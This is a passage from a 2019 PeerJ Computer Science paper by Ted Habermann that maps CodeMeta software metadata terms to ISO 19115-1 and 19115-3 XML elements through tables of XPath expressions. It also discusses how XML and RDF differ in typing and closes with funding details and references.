identificationInfo.citation.onlineResource [function=’information’]a /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/cit:onlineResource/ cit:CI_OnlineResource/mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:onlineResource/cit:CI_OnlineResource[gmd:function/ gmd:CI_OnLineFunctionCode,’information’]/cit:linkage sameAs URL URL of a reference Web page that unam- biguously indicates the item’s identity. E.g. the URL of the item’s Wikipedia page, Wikidata entry, or official website. identificationInfo.citation.onlineResource [function=’information’]a /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/cit:onlineResource/ cit:CI_OnlineResource/mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:onlineResource/cit:CI_OnlineResource[gmd:function/ gmd:CI_OnLineFunctionCode,’information’]/cit:linkage url URL URL of the item. identificationInfo.citation.onlineResource [function=’download’]a /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:onlineResource/cit:CI_OnlineResource[gmd:function/ gmd:CI_OnLineFunctionCode,’download’]/cit:linkage Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 10/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 6 Mapping of CodeMeta terms from the Thing.CreativeWork schema to ISO 19115-1 and ISO 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 aAuthor Organization or person The author of this content or rating. Please note that author is special in that HTML 5 provides a special mechanism for indicating authorship via the rel tag. That is equivalent to this and may be used in- terchangeably. identificationInfo.citation. citedResponsi- bleParty[role=’author’].party.name or identifi- cationInfo.citation. citedResponsibleParty[role =’originator’].party.name /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’author’] or /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’originator’] citation CreativeWork or URL A citation or reference to another creative work, such as another publication, web page, scholarly article, etc. identificationInfo.associatedResource.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:associatedResource/ mri:MD_AssociatedResource/mri:name/cit:CI_Citation contributor Organization or Person A secondary contributor to the Creative- Work or Event. identificationInfo.citation.citedResponsibleParty [not(role=’author’ or role =’principalInvestigator’ or role =’originator’)].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:citedResponsibleParty/cit:CI_Responsibility[not (cit:role/cit:CI_RoleCode=’author’ or cit:role/cit:CI_RoleCode =’principalInvestigator’ or cit:role/cit:CI_RoleCode =’originator’)]/cit:party/*/cit:name copyright Holder Organization or Person The party holding the legal copyright to the CreativeWork. identificationInfo.resourceConstraints.reference. citedResponsibleParty /mdb:MD_Metadata/mdb:identificationInfo/*/mri:resourceConstraints/ mco:MD_LegalConstraints/mco:reference/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility copyright Year Number The year during which the claimed copy- right for the CreativeWork was first as- serted. identificationInfo.resourceConstraints.reference. date[dateType=’publication’].date /mdb:MD_Metadata/mdb:identificationInfo/*/mri:resourceConstraints/ mco:MD_LegalConstraints/mco:reference/cit:CI_Citation/ cit:date/cit:CI_Date[cit:dateType/cit:CI_DateTypeCode =’publication’]/cit:dateType creator Organization or Person The creator/author of this CreativeWork. This is the same as the Author property for CreativeWork. identificationInfo.citation.citedResponsibleParty [role=’author’].party.name or identifica- tionInfo.citation.citedResponsibleParty[role =’originator’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’author’] or /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’originator’] date Created Date or Date- Time The date on which the CreativeWork was created or the item was added to a DataFeed. identificationInfo.citation.date[dateType =’creation’]. datea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:date/cit:CI_Date[cit:dateType/cit:CI_DateTypeCode =’creation’]/cit:date/gco:DateTime date Modified Date or Date- Time The date on which the CreativeWork was most recently modified or when the item’s entry was modified within a DataFeed. identificationInfo.citation.date[dateType =’revision’]. datea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:date/cit:CI_Date[cit:dateType/cit:CI_DateTypeCode =’revision’]/cit:date/gco:DateTime date Published Date Date of first broadcast/publication. identificationInfo.citation.date[dateType =’publication’].datea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:date/cit:CI_Date[cit:dateType/cit:CI_DateTypeCode =’publication’]/cit:date/gco:Date editor Person Specifies the person who edited the Cre- ativeWork. identificationInfo.citation.citedResponsibleParty [role=’editor’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/ cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’editor’] (continued on next page) H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 11/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 6 (continued) Property Type Description ISO 19115-1 ISO 19115-3 encoding MediaObject A media object that encodes this Creative- Work. This property is a synonym for as- sociatedMedia. Supersedes encodings. fileFormat Text or URL Media type, typically MIME format (see IANA site) of the content e.g., applica- tion/zip of a SoftwareApplication binary. In cases where a CreativeWork has several media type representations, ’encoding’ can be used to indicate each MediaObject alongside particular fileFormat informa- tion. Unregistered or niche file formats can be indicated instead via the most ap- propriate URL, e.g., defining Web page or a Wikipedia entry. identificationInfo.resourceFormat. formatSpecifi- cationCitation /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/ mri:resourceFormat/mrd:MD_Format/mrd:formatSpecificationCitation/ cit:CI_Citation funder Organization or Person A person or organization that supports (sponsors) something through some kind of financial contribution. identificationInfo.citation.citedResponsibleParty [role=’funder’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’funder’] hasPart CreativeWork Indicates a CreativeWork that is (in some sense) a part of this CreativeWork. Re- verse property isPartOf identificationInfo.associatedResource [associa- tionType=’isComposedOf’].namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:associatedResource/ mri:MD_AssociatedResource[mri:associationType/mri:DS_AssociationTypeCode =’isComposedOf’]/mri:name/cit:CI_Citation isAccessibleForFree Boolean A flag to signal that the publication is ac- cessible for free. distributionInfo.distributionFormat.format Distributor.distributionOrderProcess.fees /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributionFormat/mrd:MD_Format/mrd:formatDistributor/ mrd:MD_Distributor/mrd:distributionOrderProcess/ mrd:MD_StandardOrderProcess/mrd:fees isPartOf CreativeWork Indicates a CreativeWork that this Cre- ativeWork is (in some sense) part of. Re- verse property hasPart identificationInfo.associatedResource [associa- tionType=’LargerWorkCitation’].namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:associatedResource/ mri:MD_AssociatedResource[mri:associationType/mri:DS_AssociationTypeCode =’LargerWorkCitation’]/mri:name/cit:CI_Citation keywords Text Keywords or tags used to describe this content. Multiple entries in a keywords list are typically delimited by commas. identificationInfo.descriptiveKeywords[type =’theme’]. Keyworda /mdb:MD_Metadata/mdb:identificationInfo/*/mri:descriptiveKeywords/ mri:MD_Keywords[mri:type/mri:MD_KeywordTypeCode =’theme’]/mri:keyword/gco:CharacterString license CreativeWork or URL A license document that applies to this content, typically indicated by URL. identificationInfo.resourceConstraints.reference /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/ mri:resourceConstraints/mco:MD_LegalConstraints/mco:reference/cit:CI_Citation position Integer or Text The position of an item in a series or se- quence of items. (While schema.org con- siders this a property of CreativeWork, it is also the way to indicate ordering in any list (e.g., the Authors list). By default ar- rays are unordered in JSON-LD producer Organization or Person The person or organization who produced the work (e.g., music album, movie, tv/ra- dio series etc.). identificationInfo.citation.citedResponsibleParty [role=’creator’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’creator’]/cit:party/a provider Organization or Person The service provider, service operator, or service performer; the goods pro- ducer. Another party (a seller) may offer those services or goods on behalf of the provider. A provider may also serve as the seller. Supersedes carrier. identificationInfo.pointOfContact [role =’pointOfContact’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/srv:SV_ServiceIdentification/ mri:pointOfContact/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’provider’]/cit:party/* (continued on next page) H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 12/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 6 (continued) Property Type Description ISO 19115-1 ISO 19115-3 publisher Organization or Person The publisher of the creative work. identificationInfo.citation.citedResponsibleParty [role=’publisher’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’publisher’]/cit:party/a sponsor Organization or person A person or organization that supports a thing through a pledge, promise, or fi- nancial contribution. e.g., a sponsor of a Medical Study or a corporate sponsor of an event. identificationInfo.citation.citedResponsibleParty [role=’sponsor’].party.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:citedResponsibleParty/cit:CI_Responsibility[cit:role/cit:CI_RoleCode =’sponsor’]/cit:party/a version Number or Text The version of the CreativeWork embod- ied by a specified resource. identificationInfo.citation.edition /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/mri:citation/ cit:CI_Citation/cit:edition/gco:CharacterString Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 13/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 7 Mapping of CodeMeta terms from the Thing.CreativeWork.SoftwareSourceCode schema to ISO 19115-1 and ISO 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 Code Repository URL Link to the repository where the un- compiled, human readable code and re- lated code is located (SVN, github, Code- Plex). distributionInfo.distributor.distributor TransferOptions.onLine[function =’download’].linkage or distribution- Info.distributor.distributorTransferOptions. onLine[function=’information’].linkage or distributionInfo.transferOptions.onLine [function=’download’].linkage or distributionInfo.transferOptions.onLine [function=’information’].linkage or identificationInfo.citation.onlineResource [function=’download’].linkage or identificationInfo.citation.onlineResource [function=’information’].linkage* /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributor/mrd:MDDistributor/mrd:distributorTransferOptions/ mrd:MDDigitalTransferOptions/mrd:onLine/cit:CI_OnLineResource[cit: function/cit:CI_OnLineFunctionCode =’information’]/ cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:distributionInfo/mrd:MD_Distribution/mrd:transferOptions/ mrd:MDDigitalTransferOptions/mrd:onLine/cit:CI_OnLineResource [cit:function/cit:CI_OnLineFunctionCode =’information’]/ cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:onlineResource/cit:CI_OnLineResource[cit:function/ cit:CI_OnLineFunctionCode =’information’] /cit:linkage/ gco:CharacterString or /mdb:MD_Metadata/mdb:distributionInfo/ mrd:MD_Distribution/mrd:distributor/mrd:MDDistributor/ mrd:distributorTransferOptions/mrd:MDDigitalTransferOptions/ mrd:onLine/cit:CI_OnLineResource[cit:function/ cit:CI_OnLineFunctionCode =’download’] /cit:linkage/ gco:CharacterString or /mdb:MD_Metadata/mdb:distributionInfo/ mrd:MD_Distribution/mrd:transferOptions/mrd:MDDigitalTransferOptions/ mrd:onLine/cit:CI_OnLineResource[cit:function/ cit:CI_OnLineFunctionCode =’download’] /cit:linkage/ gco:CharacterString or /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:citation/cit:CI_Citation/cit:onlineResource/ cit:CI_OnLineResource[cit:function/ cit:CI_OnLineFunctionCode =’download’] /cit:linkage/gco:CharacterString ProgrammingLanguage Computer Lan- guage or Text The computer programming language. identificationInfo.descriptiveKeywords[type =’theme’]. keyworda /mdb:MD_Metadata/mdb:identificationInfo/*/mri:descriptiveKeywords/ mri:MD_Keywords[mri:type/mri:MD_KeywordTypeCode =’theme’]/mri:keyword/gco:CharacterString Runtime Platform Text Runtime platform or script interpreter dependencies (Example—Java v1, Python2.3, .Net Framework 3.0). Supersedes runtime. identificationInfo.environmentDescriptiona /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/ mri:environmentDescription/gco:CharacterString Target Product Software Appli- cation Target Operating System/Product to which the code applies. If applies to sev- eral versions, just the product name can be used. identificationInfo.associatedResource.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:associatedResource/ mri:MD_AssociatedResource/mri:name/cit:CI_Citation Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 14/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 8 Mapping of CodeMeta terms from the CodeMeta.SoftwareSourceCode schema to ISO 19115-1 and ISO 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 Build instructions URL Link to installation instructions/documen- tation IdentificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:additionalDocumentation/cit:CI_Citation cont Integration URL link to continuous integration service identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:additionalDocumentation/cit:CI_Citation developmentStatus Text Description of development status, e.g., Active, inactive, supsended. See reposta- tus.org identificationInfo.status /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:status/mcc:MD_ProgressCode embargo Date Date Software may be embargoed from public access until a specified date (e.g., pending publication, 1 year from publication) identificationInfo.citation.date[dateType =’released’]. datea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:citation/ cit:CI_Citation/cit:date/cit:CI_Date[cit:dateType/ cit:CI_DateTypeCode =’released’]/cit:date/gco:DateTime funding Text Funding source (e.g., specific grant) identificationInfo.associatedResourcea /mdb:MD_Metadata/mdb:identificationInfo/*/ mri: associatedResource/mri:MD_AssociatedResource/mri:name/cit:CI_Citation issueTracker URL link to software bug reporting or issue tracking system identificationInfo.resourceSpecificUsage. identifiedIssues.onlineResource.linkage /mdb:MD_Metadata/mdb:identificationInfo/*/mri: resourceSpecificUsage/mri:MD_Usage/mri:identifiedIssues/cit:CI_Citation maintainer Person Individual responsible for maintaining the software (usually includes an email con- tact address) identificationInfo.pointOfContact /mdb:MD_Metadata/mdb:identificationInfo/*/mri:pointOfContact readme URL link to software Readme file identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:additionalDocumentation/cit:CI_Citation reference Publication ScholarlyArticle An academic publication related to the software. identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:additionalDocumentation/cit:CI_Citation software Suggestions SoftwareSourceCode Optional dependencies, e.g., for optional features, code development, etc identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/ mri:additionalDocumentation/cit:CI_Citation Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 15/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Schema:Thing.CreativeWork.SoftwareApplication The Thing.CreativeWork.SoftwareApplication schema provides a vocabulary for describing a software application. This mapping includes fifteen items listed in Table 9. CONCLUSIONS The ISO metadata standards were originally developed by ISO Technical Committee 211 to serve as the standard and structured part of the documentation needed to discover, access, use, and understand datasets. The standards acknowledge that they are generic, and they include several mechanisms for extension to address specific needs of communities that build on the standards. The generic nature of these standards is reflected in the breadth of the codelist that can be used to describe the scope of a particular metadata record (see list in Model Characteristics Section above and Habermann, 2018a; Habermann, 2018b; Habermann, 2018c). The CodeMeta project recently proposed over sixty terms that can be used in metadata for software. This recommendation provides a framework that provides insight into what ISO metadata for software might contain. The ISO metadata standards include several elements that directly cite software, e.g., the processingInformation.softwareReference or algorithm.citation elements, and the primary purpose of the mappings proposed here is to support ISO users that want to (1) express software metadata in a dialect that they are familiar with and (2) to facilitate translation of software metadata written using ISO standards to CodeMeta-compliant JSON-LD. Note that the purpose is different than the primary purpose of the crosswalks proposed on the CodeMeta project site which is to facilitate automated translations between different JSON-LD vocabularies and RDF. Adding an ISO crosswalk to the CodeMeta framework was the original goal of this work, but the differences identified and described here are significant enough to make that impossible. This translation may be facilitated with an XSLT built specifically for that purpose, like the one created by Peroni, Lapeyre & Shotton, 2012, but that is beyond the scope of this initial comparison. The process of creating a mapping between these two representations surfaced some differences that complicate the mapping. Some of these differences are related to hard and soft typing used in the two models and others are related to increased flexibility that is required in a generic standard like ISO for documenting citations, distribution channels, and related resources. The differences in approach described here probably apply to many mappings from XML to RDF representations. Peroni, Lapeyre & Shotton, 2012 identified and discussed some similar challenges when mapping between JATS XML and SPAR Ontologies. They attributed these differences to ‘‘differing philosophical viewpoints for XML and RDF’’, then described two reasons that XML element names are ambiguous when used in isolation: attributes and hierarchical structure. They suggest that the JATS standard (and by implication all XML representations) is ‘‘deliberately vague’’ and that the hierarchical structure of XML is ‘‘not formalized and implicitly lives outside the XML schema of the language’’. It is certainly true that XML element names can be ambiguous without Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 16/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 9 Mapping of CodeMeta terms from the schema:Thing.CreativeWork.SoftwareApplication schema to ISO 19115-1 and 19115-3. Property Type Description ISO 19115-1 ISO 19115-3 application Category Text or URL Type of software application, e.g., ’Game, Multimedia’. identificationInfo.descriptiveKeywords[type =’theme’].keyword* /mdb:MD_Metadata/mdb:identificationInfo/*/mri:descriptiveKeywords/ mri:MD_Keywords[mri:type/mri:MD_KeywordTypeCode =’theme’]/ mri:keyword/gco:CharacterString application SubCategory Text or URL Subcategory of the application, e.g., ‘Arcade Game’. identificationInfo.descriptiveKeywords[type =’theme’].keyword* /mdb:MD_Metadata/mdb:identificationInfo/*/mri:descriptiveKeywords/ mri:MD_Keywords[mri:type/mri:MD_KeywordTypeCode =’theme’]/mri:keyword/ gco:CharacterString download Url URL If the file can be downloaded, URL to download the binary. distributionInfo.distributor.distributor TransferOptions.onLine[function =’download’].linkage or distributionInfo.transfer Options.onLine[function =’download’].linkage or identification- Info.citation.onlineResource[function =’download’].linkage /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributor/mrd:MD_Distributor/mrd:distributorTransferOptions/ mrd:MD_DigitalTransferOptions/mrd:onLine/cit:CI_OnlineResource [cit:function/cit:CI_OnLineFunctionCode =’download’]/ cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:distributionInfo/mrd:MD_Distribution/mrd:transferOptions/ mrd:MD_DigitalTransferOptions/mrd:onLine/cit:CI_OnlineResource [cit:function/cit:CI_OnLineFunctionCode =’download’] / cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:onlineResource/cit:CI_OnlineResource[cit:function/ cit:CI_OnLineFunctionCode =’download’] /cit:linkage/gco:CharacterString fileSize Text Size of the application/package (e.g., 18MB). In the absence of a unit (MB, KB etc.), KB will be as- sumed. distributionInfo.transferOptions.transferSize or distribution- Info.distributionFormat.formatDistributor. distributorTransferOptions.transferSize or distribution- Info.distributor.distributorTransferOptions .transferSize /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:transferOptions/mrd:MD_DigitalTransferOptions/mrd:transferSize/ gco:Real or /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributionFormat/mrd:MD_Format/mrd:formatDistributor/ mrd:MD_Distributor/mrd:distributorTransferOptions/ mrd:MD_DigitalTransferOptions/mrd:transferSize/gco:Real or / mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributor/mrd:MD_Distributor/mrd:distributorTransferOptions/ mrd:MD_DigitalTransferOptions/mrd:transferSize/gco:Real installUrl URL URL at which the app may be in- stalled, if different from the URL of the item. distributionInfo.distributor.distributor TransferOptions.onLine[function=’download’]. linkage or distribution- Info.transferOptions.onLine [function=’download’].linkage or identificationInfo. citation.onlineResource[function =’download’].linkage /mdb:MD_Metadata/mdb:distributionInfo/mrd:MD_Distribution/ mrd:distributor/mrd:MD_Distributor/mrd:distributorTransferOptions/ mrd:MD_DigitalTransferOptions/mrd:onLine/cit:CI_OnlineResource [cit:function/cit:CI_OnLineFunctionCode =’download’]/ cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:distributionInfo/mrd:MD_Distribution/mrd:transferOptions/ mrd:MD_DigitalTransferOptions/mrd:onLine/cit:CI_OnlineResource [cit:function/cit:CI_OnLineFunctionCode =’download’]/ cit:linkage/gco:CharacterString or /mdb:MD_Metadata/ mdb:identificationInfo/*/mri:citation/cit:CI_Citation/ cit:onlineResource/cit:CI_OnlineResource[cit:function/ cit:CI_OnLineFunctionCode =’download’]/cit:linkage/gco:CharacterString (continued on next page) H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 17/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 Table 9 (continued) Property Type Description ISO 19115-1 ISO 19115-3 memory Requirements Text or URL Minimum memory requirements. identificationInfo.environmentDescriptiona /mdb:MD_Metadata/mdb:identificationInfo/mri: MD_DataIdentification/mri:environmentDescription/gco:CharacterString operating System Text Operating systems supported (Windows 7, OSX 10.6, Android 1.6). identificationInfo.environmentDescriptiona /mdb:MD_Metadata/mdb:identificationInfo/mri: MD_DataIdentification/mri:environmentDescription/gco:CharacterString permissions Text Permission(s) required to run the app (for example, a mobile app may require full internet access or may run only on wifi). identificationInfo.resourceConstraints or iden- tificationInfo.resourceConstraints.reference. onlineResource.linkage /mdb:MD_Metadata/mdb:identificationInfo/*/mri:resourceConstraints/ mco:MD_LegalConstraints or /mdb:MD_Metadata/mdb:identificationInfo/ mri:MD_DataIdentification/mri:resourceConstraints/ mco:MD_LegalConstraints/mco:reference/cit:CI_Citation/ cit:onlineResource/cit:CI_OnlineResource/cit:linkage processor Requirements Text Processor architecture required to run the application (e.g., IA64). identificationInfo.environmentDescriptiona /mdb:MD_Metadata/mdb:identificationInfo/mri: MD_DataIdentification/mri:environmentDescription/gco:CharacterString release Notes Text or URL Description of what changed in this version. identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/mri:additionalDocumentation/ cit:CI_Citation software Help CreativeWork Software application help. identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/mri:additionalDocumentation/ cit:CI_Citation software Requirements SoftwareSourceCode Required software dependencies identificationInfo.additionalDocumentationa /mdb:MD_Metadata/mdb:identificationInfo/*/mri:additionalDocumentation/ cit:CI_Citation software Version Text Version of the software instance. identificationInfo.citation.edition /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/ mri:citation/cit:CI_Citation/cit:edition storage Requirements Text or URL Storage requirements (free space required). identificationInfo.environmentDescriptiona /mdb:MD_Metadata/mdb:identificationInfo/mri:MD_DataIdentification/ mri:environmentDescription/gco:CharacterString supporting Data DataFeed Supporting data for a Software Ap- plication. identificationInfo.associatedResource.namea /mdb:MD_Metadata/mdb:identificationInfo/*/mri:associatedResource/ mri:MD_AssociatedResource/mri:name/cit:CI_Citation Notes. aMultiple CodeMeta terms are mapped to this ISO XML element, some with different attributes. H aberm ann (2019),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.174 18/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 associated attributes and hierarchical structure but ignoring those methods of providing meaning in XML and then stating that elements alone are ambiguous does not contribute to understanding differences between how these two approaches describe resources. I examine these differences in more detail and offer an explanation that is related to different approaches to defining types: XML can use attributes and structure to provide information about types and meaning while RDF must rely on unambiguous and shared definitions of terms. To use the case described in Peroni, Lapeyre & Shotton, 2012, the JATS element ‘‘article’’ is definitely ambiguous. That is why the definition of the element includes an attribute called article-type to clarify the type of the article being described. Details of the importance of attributes for semantics in XML is described in detail by Seligy (2018) along with potential problems that result from ignoring attribute values. Peroni, Lapeyre & Shotton (2012) also acknowledge the requirement for unambiguous definitions that are shared across communities. They state that ‘‘A cornerstone of the Semantic Web is the use of open published ontologies to give precise and universally available definitions to terms, so that RDF statements, whatever else they are, are unambiguous in their meaning.’’ While this may be a goal of ontology development efforts, many of the definitions currently used in CodeMeta and schema.org (shown in Tables 5–9) are unclear, non-unique, and ambiguous. ISO mappings are proposed for sixty-four of the sixty-eight CodeMeta V2 terms. These mappings can be used to create CodeMeta-compliant metadata from existing stores of ISO metadata and to add CodeMeta compliant software citations in the future. This compares to an average of 11.2 mappings for other dialects included in the CodeMeta crosswalk. This disparity reflects the use cases targeted by the dialects. Many of the dialects that have been mapped to CodeMeta are focused on citation or dependency identification and management while ISO and CodeMeta share additional targets that include access, use, and understanding. ACKNOWLEDGEMENTS Thanks to Matt Jones, Carl Boettiger, Dennis Walworth, and Melissa Harrison for helpful comments and discussion of the initial draft of this paper. ADDITIONAL INFORMATION AND DECLARATIONS Funding All of this material is based upon work supported by the National Science Foundation under Grant No. NSFDACS11C1675 and by NASA/GSFC under Raytheon Co. contract number NNG15HZ39C. There was no additional external funding received for this study. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the author: Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 19/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.174 National Science Foundation: NSFDACS11C1675. NASA/GSFC: NNG15HZ39C. Competing Interests Ted Habermann is the Director of Earth Science at The HDF Group. The author declares that there are no competing interests. Author Contributions • Ted Habermann conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. Data Availability The following information was supplied regarding data availability: Habermann, Ted (2018): MappingTables_ISO19115-1ToCodeMeta.csv. figshare. Dataset. https://doi.org/10.6084/m9.figshare.7430282.v1. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.174#supplemental-information. REFERENCES CodeMeta Crosswalk. 2018. Available at https://CodeMeta.github.io/crosswalk/ (accessed on 20 August 2018). CodeMeta Project. 2018. Available at https://CodeMeta.github.io (accessed on 1 October 2018). Crosswalk Data. 2018. codemeta/crosswalk.csv. Available at https://github.com/ CodeMeta/CodeMeta/blob/8027db72f1c2b956453b38cc4711e498bdaa46ce/crosswalk. csv (accessed on 20 August 2018). DataCite Metadata Working Group. 2017. DataCite metadata schema documentation for the publication and citation of research data. DataCite e.V. Version 4.1. DOI 10.5438/0014. Gordon S, Habermann T. 2018. The influence of community recommendations on metadata completeness. Ecological Informatics 43:38–51 DOI 10.1016/j.ecoinf.2017.09.005. Habermann T. 2018a. Metadata life cycles, use cases and hierarchies. Geosciences 8(5):179 DOI 10.3390/geosciences8050179. Habermann T. 2018b. MappingTables_ISO19115-1ToCodeMeta.csv. figshare. Dataset DOI 10.6084/m9.figshare.7430282.v1. Habermann T. 2018c. CodeMeta mapping to ISO 19115. Available at https://github. com/CodeMeta/CodeMeta/blob/master/crosswalks/ISO_19115-1.csv (accessed on 4 January 2019). Habermann (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.174 20/21 https://peerj.com https://doi.org/10.6084/m9.figshare.7430282.v1 http://dx.doi.org/10.7717/peerj-cs.174#supplemental-information http://dx.doi.org/10.7717/peerj-cs.174#supplemental-information https://CodeMeta.github.io/crosswalk/ https://CodeMeta.github.io https://github.com/CodeMeta/CodeMeta/blob/8027db72f1c2b956453b38cc4711e498bdaa46ce/crosswalk.csv https://github.com/CodeMeta/CodeMeta/blob/8027db72f1c2b956453b38cc4711e498bdaa46ce/crosswalk.csv https://github.com/CodeMeta/CodeMeta/blob/8027db72f1c2b956453b38cc4711e498bdaa46ce/crosswalk.csv http://dx.doi.org/10.5438/0014 http://dx.doi.org/10.1016/j.ecoinf.2017.09.005 http://dx.doi.org/10.3390/geosciences8050179 http://dx.doi.org/10.6084/m9.figshare.7430282.v1 https://github.com/CodeMeta/CodeMeta/blob/master/crosswalks/ISO_19115-1.csv https://github.com/CodeMeta/CodeMeta/blob/master/crosswalks/ISO_19115-1.csv http://dx.doi.org/10.7717/peerj-cs.174 International Organization for Standardization (ISO) 19115-1, Geographic information—Metadata—Part 1: Fundamentals. 2014. Available at https://www. iso.org/standard/53798.html. (accessed on 1 October 2018). International Organization for Standardization (ISO) 19115-1, Geographic information—Metadata—Part 3: XML schema implementation for fundamental concepts. 2016. Available at https://www.iso.org/standard/32579.html. (accessed on 1 October 2018). ISO Conceptual Model. 2018. ISO Conceptual Model—HTML View. Available at https://www.isotc211.org/hmmg/HTML/ConceptualModels/ (accessed on 1 October 2018). Peroni S, Lapeyre DA, Shotton D. 2012. From markup to linked data: mapping NISO JATS v1.0 to RDF using the SPAR (Semantic Publishing and Referencing) ontologies. In: Journal Article Tag Suite Conference (JATS-Con) 